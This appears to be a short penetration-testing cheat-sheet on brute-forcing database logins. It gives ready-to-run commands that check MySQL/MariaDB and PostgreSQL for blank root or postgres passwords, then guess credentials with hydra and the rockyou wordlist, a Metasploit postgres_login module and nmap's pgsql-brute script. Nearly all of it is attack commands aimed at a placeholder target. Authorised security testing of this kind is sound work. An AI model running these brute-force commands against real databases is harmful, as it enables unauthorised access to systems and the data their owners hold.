Brute-forcing Databases

assuming you got your dictionaries ready

MySQL / MariaDB

first check that it responds and that you cannot simply login as root w/o a password or with an empty password

apt install mariadb-client

mysql -u root -h $target
mysql -u root -h $target -p

and check again if you’re there’s a specific username you’re expecting

PostgreSQL

first check that it responds and that you cannot simply login as postgres w/o a password or with an empty password

apt install postgresql-client

psql -U postgres -h $target
psql -U postgres -w -h $target

and check again if you’re there’s a specific username you’re expecting

Ready to go

hydra

apt install hydra

usernames=/usr/share/wordlists/usernames.concat.txt
passwords=/usr/share/wordlists/rockyou.txt

mariadb

hydra -l root -P $passwords $target mysql

postgres

hydra -L $usernames -P $passwords $target postgres

msf

postgres

use auxiliary/scanner/postgres/postgres_login
show options
set BLANK_PASSWORDS true
set DATABASE postgres
set RHOSTS TARGET-HERE
run

nmap

postgres

nmap -p 5432 --script pgsql-brute $target

Resources

Password Cracking:PostgreSQL https://www.hackingarticles.in/6-ways-to-hack-postgressql-login/

A Penetration Tester’s Guide to PostgreSQL https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9

pgsql-brute NSE Script https://nmap.org/nsedoc/scripts/pgsql-brute.html


GUIDES | LECTURES | BENCHMARKS | SMTP HEALTH